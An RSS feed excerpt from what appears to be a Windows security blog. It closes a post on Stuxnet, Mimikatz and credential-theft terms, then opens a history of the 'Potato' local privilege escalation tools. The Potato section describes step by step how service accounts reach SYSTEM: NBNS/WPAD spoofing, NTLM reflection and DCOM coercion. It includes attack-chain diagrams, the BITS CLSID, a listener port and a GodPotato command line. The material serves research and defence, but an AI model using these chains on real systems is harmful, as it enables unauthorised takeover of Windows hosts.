No. The Symantec dossier was authored by Nicolas Falliere, Liam O Murchu, and Eric Chien of Symantec Security Response, v1.4, February 2011 [@symantec-stuxnet-dossier-v14]. Bruce Dang was at Microsoft&apos;s Security Response Center and co-presented &quot;Adventures in Analyzing Stuxnet&quot; with Peter Ferrie at the 27th Chaos Communication Congress (27C3) in Berlin on December 27, 2010 [@dang-ferrie-27c3], which is a separate primary covering the win32k.sys CVE-2010-2743 kernel exploit walkthrough (the 27C3-not-29C3 venue correction is documented in the §3.1 sidenote). Dang&apos;s affiliation is Microsoft MSRC, not Symantec.

No. Mimikatz&apos;s first public release was May 2011 (closed source) [@greenberg-mimikatz-wired; @wikipedia-mimikatz]. The GitHub repository `gentilkiwi/mimikatz` was created on April 6, 2014 at 18:30:02 UTC -- a timestamp anyone can verify via the GitHub API [@mimikatz-github]. Any &quot;2007&quot; date refers to Delpy&apos;s pre-release private experimentation, not a public release.

No. Both anchor events post-date the Part 3 window. Dell SecureWorks Counter Threat Unit disclosed the Skeleton Key malware family on January 12, 2015 [@secureworks-skeleton-key], and Delpy added the corresponding `misc::skeleton` module to Mimikatz on January 17, 2015. Skeleton Key, DCSync, and the Credential Guard architectural pivot are the spine of Part 4 [@metcalf-dcsync; @ms-credential-guard].
&lt;p&gt;Skeleton Key. Virtualisation-Based Security. Credential Guard. Part 4 opens on January 17, 2015, with the same Mimikatz codebase and a new technique.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-security-wars-part-3-hardening-decade&quot; keyTerms={[
  { term: &quot;LSASS&quot;, definition: &quot;Local Security Authority Subsystem Service: the long-lived user-mode Windows process that caches NT hashes, Kerberos tickets, and (depending on loaded security packages) recoverable plaintext credentials for single sign-on.&quot; },
  { term: &quot;AppContainer&quot;, definition: &quot;A Windows access token with a per-package security identifier and capability-SID vector; resource access checks intersect the capability set with the resource ACL. The substrate for WinRT / Modern apps in Windows 8 and MSIX / Win32 App Isolation in modern Windows.&quot; },
  { term: &quot;Pass-the-Hash (PtH)&quot;, definition: &quot;Replay an NT hash as a bearer credential against any NTLM-accepting service, without ever knowing the user&apos;s plaintext password.&quot; },
  { term: &quot;Pass-the-Ticket (PtT)&quot;, definition: &quot;Extract a Kerberos Ticket-Granting Ticket or service ticket from LSASS and re-import it into another logon session for replay.&quot; },
  { term: &quot;Overpass-the-Hash&quot;, definition: &quot;Use a stolen NT hash to request a fresh Kerberos TGT from the KDC; the bridge from an NTLM-recovered hash to a Kerberos-issued ticket.&quot; },
  { term: &quot;Golden Ticket&quot;, definition: &quot;A forged Kerberos TGT signed with the stolen NT hash of the domain&apos;s krbtgt account; grants arbitrary user, group, and lifetime impersonation across the AD forest.&quot; },
  { term: &quot;Protected Process Light (PPL)&quot;, definition: &quot;A kernel-enforced signer level that prevents OpenProcess(PROCESS_VM_READ) and code injection against the protected process from lower-signer-level callers, regardless of token privileges.&quot; },
  { term: &quot;ELAM&quot;, definition: &quot;Early Launch Antimalware: the first boot-start driver, allowed to inspect and classify subsequent boot-start drivers via BDCB_CLASSIFICATION before they load.&quot; },
  { term: &quot;Secure Boot&quot;, definition: &quot;UEFI firmware verification of the signature of every UEFI driver, option ROM, and OS loader before transferring control, anchored by the Platform Key and signed Key Exchange Keys.&quot; },
  { term: &quot;VTL0 / VTL1&quot;, definition: &quot;Virtual Trust Levels introduced by Hyper-V in Windows 10 1507; VTL0 is the normal Windows kernel attackers compromise, VTL1 is Virtual Secure Mode where Credential Guard hosts the LSAISO trustlet that holds high-value credential material.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>mimikatz</category><category>stuxnet</category><category>pass-the-hash</category><category>credential-theft</category><category>applocker</category><category>secure-boot</category><category>lsass</category><category>The Windows Security Wars</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>SYSTEM in Ten Seconds: How the Potato Family Survived Every Microsoft Mitigation</title><link>https://paragmali.com/blog/system-in-ten-seconds-how-the-potato-family-survived-every-m/</link><guid isPermaLink="true">https://paragmali.com/blog/system-in-ten-seconds-how-the-potato-family-survived-every-m/</guid><description>A decade of Windows local privilege escalation -- HotPotato through FakePotato -- rests on one architectural decision Microsoft has refused to revisit.</description><pubDate>Sun, 31 May 2026 00:00:00 GMT</pubDate><content:encoded>
The Potato family is a decade of Windows local privilege escalation, eleven named variants
disclosed between January 2016 (HotPotato) and August 2024 (FakePotato), all pivoting on the same
primitive: `SeImpersonatePrivilege` (introduced as a defined user right in the Windows 2000 SP4 /
XP SP2 / Server 2003 hardening cycle [@msrc-token-kidnapping; @ms-impersonate-policy]) plus `ImpersonateNamedPipeClient`
(a Win32 primitive documented as supported since Windows XP for clients and Windows Server 2003
for servers [@ms-impersonate-api]). Each variant -- HotPotato (January 2016), RottenPotato,
JuicyPotato, RoguePotato, PrintSpoofer, RemotePotato0, JuicyPotatoNG, GodPotato (the 2026
default), LocalPotato (CVE-2023-21746), SilverPotato, FakePotato (CVE-2024-38100) -- defeats a
specific Microsoft mitigation, but no mitigation closes the family. The structural reason is the
MSRC Windows Security Servicing Criteria, which treats the `SeImpersonatePrivilege`-to-SYSTEM
transition as a safety boundary, not a security boundary. The Potato class is therefore an
architectural decision, not a bug.
&lt;h2&gt;1. A Web Shell, Ten Seconds, SYSTEM&lt;/h2&gt;
&lt;p&gt;A red teamer drops a web shell on an Internet Information Services server running as &lt;code&gt;IIS APPPOOL\DefaultAppPool&lt;/code&gt;. Ten seconds later, the shell prints &lt;code&gt;nt authority\system&lt;/code&gt;. The operator did not exploit a memory-corruption bug, did not bypass a kernel security boundary, did not even use an undocumented API. They invoked &lt;code&gt;CoCreateInstance&lt;/code&gt; against a Distributed COM (DCOM) class identifier, waited for the SYSTEM-context RPCSS service to authenticate to a named pipe they owned, and called &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; [@ms-impersonate-api]. Every step was documented Win32 behaviour. The exploit is that Microsoft has spent a decade refusing to call any of those steps a security boundary [@msrc-servicing-criteria; @troopers24].&lt;/p&gt;
&lt;p&gt;The artefact in the operator&apos;s hand is one of several. In May 2026 it is most likely &lt;code&gt;GodPotato.exe -cmd &quot;cmd /c whoami&quot;&lt;/code&gt; -- a single Apache 2.0-licensed binary that BeichenDream published on GitHub on December 23, 2022 [@beichendream-god]. The README says it works on every supported Windows release from Windows 8 through Windows 11, and from Server 2012 through Server 2022 [@beichendream-god]. Community testing has since extended the working range to Server 2025 with default Distributed COM hardening enabled [@compass-three-headed].&lt;/p&gt;

A Windows user-rights assignment that lets a thread substitute another user&apos;s security context for its own (typically via `ImpersonateNamedPipeClient` or `ImpersonateLoggedOnUser`). Granted by default to `LOCAL SERVICE`, `NETWORK SERVICE`, every Internet Information Services application-pool identity, and most service accounts [@ms-impersonate-policy]. Introduced as a defined user right in the Windows 2000 SP4 / XP SP2 / Server 2003 service-hardening cycle that MSRC discusses in its 2009 Token Kidnapping retrospective [@msrc-token-kidnapping], after which possessing it has been one named-pipe round-trip away from being SYSTEM.
&lt;p&gt;The IIS context matters. The default application-pool identity holds &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; because IIS depends on it for legitimate request-scoped impersonation [@itm4n-printspoofer]. So does the default SQL Server service account, the Background Intelligent Transfer Service (BITS) account, the Spooler service account, and every account that hosts a Windows service that may need to &quot;act as&quot; a calling user. Anyone who can run code inside one of those accounts can run code as SYSTEM in seconds.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every step the operator takes -- &lt;code&gt;CoCreateInstance&lt;/code&gt;, the SYSTEM-context RPCSS authentication, &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;, the subsequent &lt;code&gt;CreateProcessWithToken&lt;/code&gt; -- is in Microsoft&apos;s published Win32 contract [@ms-impersonate-api; @ms-dcom-spec]. None of them is a memory-corruption bug. The &quot;exploit&quot; is the existence of a documented call sequence that turns a service account into SYSTEM, on a fully-patched Windows 11 box, in 2026.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the puzzle the rest of the article is here to solve. The technique has been a one-binary operation for nearly a decade [@troopers24]. Microsoft has shipped three named hardening waves against it (a 2019-2020 OXID-resolver fix [@forshaw-pz-2021]; the three-phase CVE-2021-26414 Distributed COM hardening rollout from June 2021 to March 2023 [@ms-kb5004442]; and per-variant CVE patches in 2023 and 2024 [@nvd-cve-2023-21746; @nvd-cve-2024-38100]). None of those waves closed the family. Why?&lt;/p&gt;
&lt;h2&gt;2. The Architectural Primitive&lt;/h2&gt;
&lt;p&gt;The answer is in a Microsoft document called the &lt;a href=&quot;https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/&quot; rel=&quot;noopener&quot;&gt;Windows Security Servicing Criteria&lt;/a&gt; [@msrc-servicing-criteria]. It defines what Microsoft will and will not service as a security vulnerability. Quoting the document directly: &quot;A security boundary provides a logical separation between the code and data of security domains with different levels of trust&quot; [@msrc-servicing-criteria]. The page then lists the boundaries Microsoft has defined for Windows -- kernel mode versus user mode, virtual machine versus host, session versus session, and so on. The list is the &lt;em&gt;enumeration&lt;/em&gt; that decides which bug classes get CVEs and which do not.&lt;/p&gt;
&lt;p&gt;The Potato family pivots on a transition that is conspicuously &lt;em&gt;not&lt;/em&gt; on the list: a service account that holds &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; becoming SYSTEM. As Andrea Pierini and Antonio Cocomazzi articulated in the Troopers 24 retrospective, Microsoft&apos;s published position is that the Windows Service Hardening boundary is a &lt;em&gt;safety&lt;/em&gt; boundary rather than a &lt;em&gt;security&lt;/em&gt; boundary, which is why so many Potato exploits continue to work on fully updated Windows systems [@troopers24]. WSH is Microsoft&apos;s own shorthand for &lt;strong&gt;Windows Service Hardening&lt;/strong&gt; -- the family of post-XP-SP2 protections that isolate service accounts from one another. The position is consistent with everything Microsoft has shipped: per-variant patches when a specific vehicle becomes too embarrassing, and silence on the underlying primitive. (The verbatim Troopers 24 articulation appears in §13.)&lt;/p&gt;

The boundary *definition* on `microsoft.com/en-us/msrc/windows-security-servicing-criteria` is rendered in static HTML and can be fetched directly [@msrc-servicing-criteria]. The boundary *enumeration table* immediately below it, which lists the bug classes that do and do not get CVEs, is JavaScript-rendered and does not appear in static fetches. The community-canonical secondary source for what is on that list is the Troopers 24 talk by Pierini and Cocomazzi [@troopers24], cross-referenced against James Forshaw&apos;s Project Zero retrospective from October 2021 [@forshaw-pz-2021] and Mark Russinovich&apos;s `aka.ms/win-security-boundaries` paraphrase. This article cites the primary for the definition and the Troopers retrospective for the enumeration.
&lt;p&gt;Three primitives, taken together, mechanically determine the entire family. Once they are stated, the only remaining question is which SYSTEM-context service is cheapest to coerce.&lt;/p&gt;
&lt;h3&gt;Primitive one: SeImpersonatePrivilege&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is a Windows user-rights assignment that permits a thread to call &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;, &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;, and the related impersonation APIs [@ms-impersonate-policy]. By Windows default, it is granted to &lt;code&gt;LOCAL SERVICE&lt;/code&gt;, &lt;code&gt;NETWORK SERVICE&lt;/code&gt;, every Internet Information Services application-pool identity, and most service accounts that need to act on behalf of clients [@itm4n-printspoofer]. (For when the right was introduced and a working definition, see §1; Decoder&apos;s one-sentence summary of what the grant means in practice is the climactic PullQuote in §6.3.)&lt;/p&gt;
&lt;h3&gt;Primitive two: ImpersonateNamedPipeClient&lt;/h3&gt;

A Win32 API that lets the server end of a named pipe adopt the security context of whoever just connected to that pipe. After the call, the calling thread holds an impersonation token for the client identity, and any subsequent system call (including `CreateProcessWithToken`) executes as that identity. The function has been part of `namedpipeapi.h` since Windows XP for clients and Windows Server 2003 for servers, with no deprecation notice as of the 2025-07-01 documentation revision [@ms-impersonate-api].
&lt;p&gt;The mechanism is exactly the one a SYSTEM-context service uses for legitimate request-scoped impersonation. The Potato class subverts it by getting a SYSTEM-context service to connect to a pipe the attacker owns. No memory corruption, no kernel exploit, no undocumented API. The Win32 reference describes the call as the standard way for a pipe server to &quot;impersonate the client end&quot; [@ms-impersonate-api].&lt;/p&gt;
&lt;h3&gt;Primitive three: the MSRC servicing-criteria carve-out&lt;/h3&gt;
&lt;p&gt;The third primitive is policy, not code. The MSRC document distinguishes a &lt;em&gt;security boundary&lt;/em&gt; (whose violation gets a CVE and a security update) from a &lt;em&gt;safety boundary&lt;/em&gt; (where Microsoft will patch when convenient but does not commit to a service-level objective). The defensible reading, articulated explicitly by Pierini and Cocomazzi at Troopers 24, is that the SYSTEM-from-&lt;code&gt;SeImpersonate&lt;/code&gt; transition lives on the safety side [@troopers24]. The implication is structural: a service account holding &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; &quot;is already privileged&quot; in Microsoft&apos;s policy view. Promoting it to SYSTEM is therefore not a privilege escalation that requires a security update.&lt;/p&gt;

flowchart LR
    A[Service account with SeImpersonatePrivilege] --&amp;gt; B[Coerce SYSTEM-context service to connect to attacker-owned named pipe]
    B --&amp;gt; C[Call ImpersonateNamedPipeClient on server thread]
    C --&amp;gt; D[Thread now holds SYSTEM impersonation token]
    D --&amp;gt; E[CreateProcessWithToken spawns SYSTEM process]
    F[MSRC servicing criteria carve-out] -.-&amp;gt;|&quot;Allows step A to remain a default grant&quot;| A
    F -.-&amp;gt;|&quot;Allows step C to remain a documented Win32 API&quot;| C
&lt;p&gt;Taken together, the three primitives reduce the entire Potato family to a single problem statement: &lt;em&gt;find the cheapest SYSTEM-context service to coerce into a callback&lt;/em&gt;. Every named variant since 2016 is an answer to that problem.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Microsoft does not consider the &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;-to-SYSTEM transition a security boundary; it considers it a safety boundary. The Potato family is the consequence. Variants change vehicles -- NetBIOS spoofing, BITS DCOM, Print Spooler RPC, EFS RPC, RPCSS OXID, ShellWindows -- but every one of them lives on the same architectural carve-out [@troopers24; @msrc-servicing-criteria].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The phrase &lt;code&gt;aka.ms/win-security-boundaries&lt;/code&gt; was popularised by Mark Russinovich&apos;s Channel 9 talks of the late 2010s. Channel 9 was retired on December 1, 2021, so the link is now mostly cited as a memorable handle for the boundary list rather than as a clickable URL. The live equivalent is the MSRC servicing criteria document itself [@msrc-servicing-criteria].&lt;/p&gt;
&lt;p&gt;Given primitives this old and this widely default-granted -- both the named-pipe impersonation API and the &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; user right have been in their current form since the Windows 2000 SP4 / Server 2003 / XP SP2 service-hardening cycle [@msrc-token-kidnapping; @ms-impersonate-policy; @ms-impersonate-api] -- the natural question is why the named Potato family did not appear until 2016. The next section is the answer.&lt;/p&gt;
&lt;h2&gt;3. The Long Pre-Potato Era, 2001-2015&lt;/h2&gt;
&lt;p&gt;In March 2008, Cesar Cerrudo stood on a stage in Dubai at Hack-in-the-Box and demonstrated that a SYSTEM-context Windows service holding &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; was, in effect, one named-pipe call away from SYSTEM [@cerrudo-hitb-slides; @msrc-token-kidnapping]. Microsoft acknowledged the technique on the MSRC blog on April 14, 2009, and shipped MS09-012 -- the patch Cerrudo later nicknamed &quot;Chimichurri&quot; in his Black Hat USA 2010 follow-up [@msrc-token-kidnapping; @blackhat-2010-cerrudo]. Cerrudo extended the work two years later at Black Hat USA 2010 in a paper titled &quot;Token Kidnapping&apos;s Revenge&quot; [@blackhat-2010-cerrudo]. Microsoft patched the specific NetworkService-to-SYSTEM vehicle. They did not revoke the privilege from the service accounts that held it [@msrc-token-kidnapping].&lt;/p&gt;
&lt;p&gt;That pattern -- patch the vehicle, leave the primitive -- is the family&apos;s bequest from Cerrudo.&lt;/p&gt;

NTLM **relay** forwards an NTLM authentication captured from victim A to a different server B, where the attacker authenticates as A. NTLM **reflection** is the special case where B is the same machine (often the same protocol) as A. Microsoft fixed the most obvious same-protocol case with MS08-068 in 2008 [@ms-ms08-068]. Cross-protocol reflection (HTTP-to-SMB, DCOM-to-RPC) was not closed by that patch and became the doorway through which the Potato family entered.
&lt;p&gt;Seven years before Cerrudo, on March 31, 2001, Sir Dystic of the Cult of the Dead Cow stood on a different stage at @lanta.con in Atlanta and released SMBRelay, the first public same-protocol &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM relay&lt;/a&gt; tool [@cultdeadcow-smbrelay]. Microsoft eventually responded with MS08-068, a &lt;em&gt;same-protocol-only&lt;/em&gt; fix [@ms-ms08-068]. Cross-protocol relay -- HTTP to SMB, DCOM to local RPC -- remained open.&lt;/p&gt;
&lt;p&gt;That opening was the canvas James Forshaw painted on. In December 2014, then at Google Project Zero, Forshaw filed Issue 222 (&quot;Windows: Local WebDAV NTLM Reflection EoP&quot;) demonstrating that the WebClient service performs NTLM authentication when asked to open a WebDAV URL, and that the resulting NTLM session can be reflected cross-protocol to the local SMB service [@forshaw-pz-2021]. A few months later Forshaw filed Issue 325, showing that &lt;code&gt;CoGetInstanceFromIStorage&lt;/code&gt; could coerce a DCOM activation into authenticating to an attacker-controlled TCP endpoint. Microsoft patched the 2015 issue as CVE-2015-2370 [@nvd-cve-2015-2370]. In his October 2021 retrospective Forshaw wrote, with the laconic precision of a researcher whose contributions are still being weaponised seven years later:&lt;/p&gt;

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits. -- James Forshaw, Project Zero, October 2021 [@forshaw-pz-2021]
&lt;p&gt;Cerrudo nicknamed the MS09-012 patch &quot;Chimichurri&quot; after the Argentine green sauce, and used the name when he reprised the work at Black Hat USA 2010 [@blackhat-2010-cerrudo]. Cerrudo was at Argeniss and later IOActive when he developed the technique [@msrc-token-kidnapping; @blackhat-2010-cerrudo].&lt;/p&gt;
&lt;p&gt;The primary artefact for Cerrudo&apos;s March 2008 Hack-in-the-Box Dubai talk (slides, video, abstract) is no longer reachable on the conference site; the MSRC blog&apos;s retrospective is the canonical secondary that anchors the date and venue [@msrc-token-kidnapping]. The Black Hat USA 2010 &quot;Token Kidnapping&apos;s Revenge&quot; whitepaper [@blackhat-2010-cerrudo] is the durable primary for the underlying technique.&lt;/p&gt;

gantt
    title Pre-Potato lineage 2001-2015
    dateFormat YYYY-MM
    section NTLM relay
    SMBRelay (Sir Dystic) :a1, 2001-03, 1M
    MS08-068 same-protocol fix :a2, 2008-10, 1M
    section Token escalation
    Token Kidnapping HITB Dubai (Cerrudo) :b1, 2008-03, 1M
    MS09-012 Chimichurri :b2, 2009-04, 1M
    Token Kidnapping&apos;s Revenge (Cerrudo) :b3, 2010-07, 1M
    section DCOM primitive
    Project Zero Issue 222 (Forshaw) :c1, 2014-12, 1M
    Project Zero Issue 325 (Forshaw) :c2, 2015-04, 1M
    CVE-2015-2370 patch :c3, 2015-07, 1M
&lt;p&gt;By the end of 2015 the three pieces were on the table. A long-standing default privilege grant (Cerrudo&apos;s &quot;SeImpersonate equals SYSTEM&quot; thesis). A specific cross-protocol reflection technique (Forshaw&apos;s WebDAV-to-SMB Issue 222). A specific DCOM-activation coercion primitive (Forshaw&apos;s &lt;code&gt;CoGetInstanceFromIStorage&lt;/code&gt; Issue 325). Microsoft had patched the literal bug in the third piece and explicitly declined to revoke the privilege in the first. The technique was published, the proof-of-concept code was on GitHub, and the family was a binary release away. The next chapter is the moment someone shipped the binary.&lt;/p&gt;
&lt;h2&gt;4. HotPotato, January 16, 2016&lt;/h2&gt;
&lt;p&gt;On January 16, 2016, Stephen Breen of Foxglove Security published a blog post titled &quot;Hot Potato&quot; [@foxglove-hotpotato]. He had just spoken at ShmooCon. The repository, &lt;code&gt;foxglovesec/Potato&lt;/code&gt;, would land on GitHub three weeks later, on February 9, 2016 [@foxglove-potato-repo]. The post&apos;s opening sentence is the family&apos;s birth certificate:&lt;/p&gt;

Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP-&amp;gt;SMB relay) and NBNS spoofing. -- Stephen Breen, Foxglove Security, January 16, 2016 [@foxglove-hotpotato]
&lt;p&gt;Breen had not invented NTLM reflection. He had combined three existing primitives into a single-binary, one-click privilege escalation that worked on every default Windows install from Windows 7 through Server 2012 [@foxglove-hotpotato]. The Foxglove post acknowledges the lineage explicitly: &quot;a similar technique was disclosed by the guys at Google Project Zero ... In fact, some of our code was shamelessly borrowed from their PoC&quot; [@foxglove-hotpotato].&lt;/p&gt;
&lt;h3&gt;How HotPotato works&lt;/h3&gt;
&lt;p&gt;The exploit chains three independent tricks. Step one is UDP-port exhaustion. The tool opens enough UDP sockets that the local NetBIOS Name Service (NBNS) name lookups fail, forcing Windows to fall back to broadcast-based name resolution [@foxglove-hotpotato]. Step two is NBNS spoofing of the WPAD hostname, pointed at &lt;code&gt;127.0.0.1&lt;/code&gt;. Step three is the actual reflection: when Windows Update or Windows Defender polls for an update, it consults the WPAD URL, gets the attacker&apos;s proxy auto-configuration script, and routes its HTTP requests through the attacker&apos;s local listener -- which then relays the SYSTEM-context NTLM negotiation to the local SMB service [@foxglove-hotpotato].&lt;/p&gt;

sequenceDiagram
    participant Atk as Hot Potato tool
    participant NBNS as NetBIOS Name Service
    participant WU as Windows Update (SYSTEM)
    participant WPAD as WPAD HTTP listener (attacker)
    participant SMB as Local SMB service
    Atk-&amp;gt;&amp;gt;NBNS: UDP-flood to exhaust ports and force broadcast
    Atk-&amp;gt;&amp;gt;NBNS: Spoof WPAD hostname pointing at 127.0.0.1
    WU-&amp;gt;&amp;gt;WPAD: GET wpad.dat over HTTP
    WPAD--&amp;gt;&amp;gt;WU: Attacker-supplied proxy auto-config
    WU-&amp;gt;&amp;gt;WPAD: HTTP request with SYSTEM-context NTLM negotiate
    WPAD-&amp;gt;&amp;gt;SMB: Reflect the NTLM exchange to local SMB
    SMB--&amp;gt;&amp;gt;Atk: SMB session authenticated as SYSTEM
    Atk-&amp;gt;&amp;gt;Atk: ImpersonateNamedPipeClient and spawn SYSTEM shell
&lt;p&gt;The result was a single binary that produced a SYSTEM shell from any local user account on the target host -- because on a default Windows install every authenticated local user can run code, open UDP sockets, and bind a loopback HTTP listener, which is all HotPotato needs to bootstrap.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; HotPotato does not use Distributed COM activation at all. It uses NetBIOS spoofing, WPAD hijacking, and HTTP-to-SMB cross-protocol relay. The family is named for HotPotato but the &lt;em&gt;defining&lt;/em&gt; primitive of every later variant -- DCOM activation -- is absent. HotPotato is in the family because it pivots through the same &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; plus named-pipe-impersonation core, which is the actual definition of the family. The repository name &lt;code&gt;Potato&lt;/code&gt; and the family naming convention are both Breen&apos;s [@foxglove-potato-repo].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The naming pattern that has now produced eleven variants started with the GitHub repository name &lt;code&gt;foxglovesec/Potato&lt;/code&gt; [@foxglove-potato-repo]. Breen later wrote that &quot;Hot&quot; was a riff on the fact that the SYSTEM token was passed around like a hot potato; the suffix convention spread from there organically.&lt;/p&gt;
&lt;h3&gt;Why HotPotato did not last&lt;/h3&gt;
&lt;p&gt;HotPotato had three structural weaknesses. NetBIOS spoofing is unreliable: the UDP-port exhaustion can fail under load, group policy can pin a real WPAD URL, and a legitimate WPAD response can win the race. NetBIOS is disabled in security-hardened environments as a matter of routine. And the HTTP-to-SMB cross-protocol path was the very thing Extended Protection for Authentication and SMB channel-binding tokens were designed to close [@crowdstrike-drop-mic]. On a Windows 10 1607 host with EPA on the SMB server, HotPotato failed.&lt;/p&gt;
&lt;p&gt;Researchers needed a coercion vehicle that was deterministic, did not rely on broadcast spoofing, and used a protocol Microsoft had not yet hardened end-to-end. Forshaw&apos;s Project Zero Issue 325 -- the &lt;code&gt;CoGetInstanceFromIStorage&lt;/code&gt; DCOM trigger -- met all three criteria [@forshaw-pz-2021]. The next variant weaponised it.&lt;/p&gt;
&lt;h2&gt;5. The DCOM-Activation Breakthrough, 2016-2018&lt;/h2&gt;
&lt;h3&gt;5.1 RottenPotato (DerbyCon 6, September 2016)&lt;/h3&gt;
&lt;p&gt;Eight months after HotPotato, Stephen Breen returned with a co-author and a new vehicle. The talk was on September 23, 2016 -- the Friday of DerbyCon 6 -- and the blog post followed three days later [@foxglove-rottenpotato]. The Foxglove post identifies the co-author by name: &quot;myself and my partner in crime, Chris Mallz (@vvalien1) spoke at DerbyCon about a project we&apos;ve been working on for the last few months&quot; [@foxglove-rottenpotato].&lt;/p&gt;
&lt;p&gt;Many secondary sources credit Andrea Pierini (Decoder) as the RottenPotato co-author. The Foxglove primary disproves this verbatim [@foxglove-rottenpotato]. Decoder enters the family lineage two years later, with JuicyPotato in 2018 [@ohpe-juicy]. Chris Mallz is the actual RottenPotato co-author.&lt;/p&gt;
&lt;p&gt;RottenPotato replaced HotPotato&apos;s NetBIOS-and-WPAD chain with Forshaw&apos;s DCOM-activation primitive. The hard-coded target was the Background Intelligent Transfer Service (BITS) Distributed COM server, class identifier &lt;code&gt;{4991d34b-80a1-4291-83b6-3328366b9097}&lt;/code&gt;, and the hard-coded listener port was &lt;code&gt;127.0.0.1:6666&lt;/code&gt; [@foxglove-rottenpotato; @foxglove-rotten-repo].&lt;/p&gt;

A Win32 OLE function that instantiates a Distributed COM object using a marshalled `IStorage` interface pointer as the activation source. By marshalling an `IStorage` whose object exporter identifier (OXID) resolves to an attacker-controlled TCP endpoint, the activator can redirect the resulting authentication callback to a listener it owns. Forshaw filed this as Project Zero Issue 325 in 2015 [@forshaw-pz-2021]; RottenPotato weaponised it.

sequenceDiagram
    participant Atk as RottenPotato (service account)
    participant Pipe as Local listener on 127.0.0.1:6666
    participant DCOM as DCOM activation (RPCSS)
    participant BITS as BITS COM server (SYSTEM)
    participant RPC as Local RPC on port 135
    Atk-&amp;gt;&amp;gt;Pipe: Start TCP listener on 127.0.0.1:6666
    Atk-&amp;gt;&amp;gt;DCOM: CoGetInstanceFromIStorage with BITS CLSID and marshalled IStorage
    DCOM-&amp;gt;&amp;gt;BITS: Spawn BITS under SYSTEM context
    BITS-&amp;gt;&amp;gt;Pipe: Callback to the marshalled endpoint
    Pipe-&amp;gt;&amp;gt;RPC: Forward COM packets to local RPC on port 135
    RPC--&amp;gt;&amp;gt;Pipe: Reply containing SYSTEM-context NTLM exchange
    Pipe--&amp;gt;&amp;gt;Atk: SYSTEM authentication captured
    Atk-&amp;gt;&amp;gt;Atk: ImpersonateNamedPipeClient and CreateProcessWithToken
&lt;p&gt;The technique was 100% reliable on Windows 7 through Windows 10 1803 and Server 2008 R2 through Server 2016 [@foxglove-rottenpotato]. There was no broadcast spoofing on the wire, no race condition, and no dependence on Windows Update polling. The price was rigidity: the hard-coded BITS class identifier and port 6666 made the tool brittle to BITS being disabled, and the original release depended on the Metasploit framework.&lt;/p&gt;
&lt;h3&gt;5.2 RottenPotatoNG and lonelypotato&lt;/h3&gt;
&lt;p&gt;In December 2017, the user &lt;code&gt;breenmachine&lt;/code&gt; published RottenPotatoNG, a C++ port that removed the Metasploit dependency: &quot;New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools&quot; [@breenmachine-rottenng]. The codebase that JuicyPotato would later generalise was now in place.&lt;/p&gt;

Many surveys date the `decoder-it/lonelypotato` variant to &quot;early 2018&quot; and place it as the link between RottenPotatoNG and JuicyPotato. The GitHub REST API reports `created_at: 2020-02-08T16:30:00Z` for the repository [@decoder-lonely], a full two years later. Decoder&apos;s first appearance in the Potato lineage is actually the December 6, 2019 post &quot;We thought they were Potatoes but they were Beans&quot; [@decoder-beans], with `lonelypotato` arriving in February 2020 as a post-OXID-hardening cleanup variant adjacent to RoguePotato [@decoder-lonely]. The 2017-2018 attribution is a citation error that has propagated across several survey papers.
&lt;h3&gt;5.3 JuicyPotato (Pierini + Trotta, July-August 2018)&lt;/h3&gt;
&lt;p&gt;What if any class identifier, not just the BITS one, could be the activation target? On July 27, 2018, Andrea Pierini and Giuseppe Trotta published the answer. The repository &lt;code&gt;ohpe/juicy-potato&lt;/code&gt; was created that day per the GitHub REST API; the blog post followed on August 10, 2018 [@ohpe-juicy]. The repository description reads: &quot;Juicy Potato (abusing the golden privileges) -- A sugared version of RottenPotatoNG, with a bit of juice&quot; [@ohpe-juicy].&lt;/p&gt;
&lt;p&gt;The original JuicyPotato blog post at &lt;code&gt;decoder.cloud/2018/08/10/juicy-potato-abusing-the-golden-privileges/&lt;/code&gt; returns HTTP 404 in 2026, and no Wayback Machine snapshot exists for that exact URL. The &lt;code&gt;ohpe/juicy-potato&lt;/code&gt; README is the live verbatim mirror of the title and the technique walkthrough [@ohpe-juicy]. Pierini&apos;s blog has reorganised several times; older posts that survive elsewhere on &lt;code&gt;decoder.cloud&lt;/code&gt; include the October 2018 &quot;No more Rotten/Juicy Potato&quot; [@decoder-no-more-rotten] and the December 2019 &quot;We thought they were Potatoes&quot; [@decoder-beans].&lt;/p&gt;
